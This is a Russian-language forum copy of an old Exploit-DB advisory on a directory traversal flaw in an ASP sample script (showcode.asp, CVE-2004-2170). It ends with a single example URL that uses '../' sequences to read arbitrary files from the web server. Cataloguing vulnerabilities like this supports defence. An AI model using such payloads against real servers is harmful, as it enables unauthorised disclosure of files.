- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23635
- Проверка EDB
-
- Пройдено
- Автор
- DR_INSANE
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2004-2170
- Дата публикации
- 2004-02-02
Код:
source: https://www.securityfocus.com/bid/9555/info
The showcode.asp script activated in Sample_showcode.html may be vulnerable to a directory traversal issue. A remote attacker may view any files readable by the web server using '../' escape sequences in URI requests.
http://www.example.org/sample_script_directory/Sample_showcode.html?fname=/../../../../target
- Источник
- www.exploit-db.com